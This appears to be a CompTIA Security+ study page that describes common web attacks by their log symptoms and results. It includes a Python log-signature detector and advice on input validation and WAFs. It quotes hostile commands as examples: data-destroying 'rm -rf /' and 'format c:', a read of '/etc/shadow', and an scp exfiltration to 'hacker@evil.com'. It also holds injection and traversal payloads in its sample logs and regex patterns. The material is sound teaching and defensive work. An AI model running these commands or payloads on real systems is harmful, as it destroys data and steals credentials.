
Recognizing Attacks

Name, Symptom, and Result

CompTIA wants you to recognize common attack categories. You need to know simplified descriptions of their symptoms and what they could lead to.

Cross-site Scripting / XSS

Symptom:
A page at "a popular social media site" contains:
<script ...></script>

Possible result:
It tricks your browser into sending an authentication cookie to a hostile server instead of the appropriate one.

SQL Injection

Symptom:
Log of transactions includes: ' or 1=1; --
or: "Strange punctuation marks"

Possible result:
Literally anything that could be done on a database server. Deleting database tables, deleting records, changing records, adding records, and so on.

Command Injection

Symptom:
The web server log contains requests that include command syntax.
Windows:
format c: /y
type \path\to\sensitive\file
Linux:
rm -rf /
cat /etc/shadow
scp /path/to-sensitive/file hacker@evil.com:
In both operating systems, spaces may be replaced with %20.

Possible result:
Literally anything. The likely examples above show deleting the entire file system and exfiltrating the contents of sensitive files.

Session Hijacking / Insecure Direct Object References

Symptom:
User Fred notices that when he is logged in to his bank, the URL includes user=fred. He changes it to his friend's name, user=mary, reloads the page, and sees her data.

Possible result:
Now he's in a session as Mary, so he can do anything that she could do with her account.

Directory Traversal

Symptom:
Server log includes ../../ in requested URLs.

Possible result:
If the server allows itself to be tricked into climbing out of the web area, an attacker can read and possibly execute files outside the web area.
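
The log symptoms described above for SQL injection, command injection, and directory traversal can be checked mechanically once the %20-style encoding is undone. The following Python code is an added example, not part of the original page; the signature list, function names, and sample log lines are constructed assumptions that cover only the simplified patterns shown on this page.

```python
import re
from urllib.parse import unquote_plus

# Simplified signatures for the log symptoms listed on this page.
# Illustrative assumptions only, not a complete detection rule set.
SIGNATURES = {
    "sql_injection": re.compile(r"'\s*or\s+1\s*=\s*1|;\s*--", re.I),
    "command_injection": re.compile(
        r"\b(?:format\s+c:|type\s+\\|rm\s+-rf\s|cat\s+/etc/shadow|scp\s+\S+\s+\S+@)",
        re.I),
    "directory_traversal": re.compile(r"\.\.[/\\]"),
}

# Request target inside a Common Log Format line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def normalize(target, max_rounds=3):
    """Percent-decode repeatedly so %20 and double-encoded (%252e) forms match."""
    for _ in range(max_rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target

def classify(log_line):
    """Return the sorted attack categories whose signature appears in the request."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    target = normalize(match.group(1))
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(target))

# Constructed sample log lines (documentation-range addresses, made-up paths).
STAMP = '- - [01/Jan/2024:10:00:00 +0000]'
SAMPLE_LOG = [
    f'192.0.2.10 {STAMP} "GET /index.html HTTP/1.1" 200 512',
    f'192.0.2.11 {STAMP} "GET /login?user=x%27%20or%201=1;%20-- HTTP/1.1" 200 734',
    f'192.0.2.12 {STAMP} "GET /ping?host=127.0.0.1;cat%20/etc/shadow HTTP/1.1" 200 91',
    f'192.0.2.13 {STAMP} "GET /static/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 404 0',
    f'192.0.2.14 {STAMP} "GET /files?name=%252e%252e%252fsecret HTTP/1.1" 403 0',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line) or ["clean"], line.split('"')[1])
```

Signature matching like this only flags the simplified patterns; it supports log review and does not replace input validation in the application.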

Cross-Site Request Forgery / XSRF / CSRF

Symptom:
Malicious content within a popular page contains a malformed <img src="..."> object.

Possible result:
A third party is disadvantaged, to the advantage of the person who dropped that comment into an unfiltered comment area.

Fixes for All of These

The common problem is that user input is not properly sanitized or validated for size, syntax, or meaning.

Adding or fixing input data validation means modifying software, so always apply patches.

WAFs or Web Application Firewalls know about these, so use one to protect the web front ends to public-facing services.
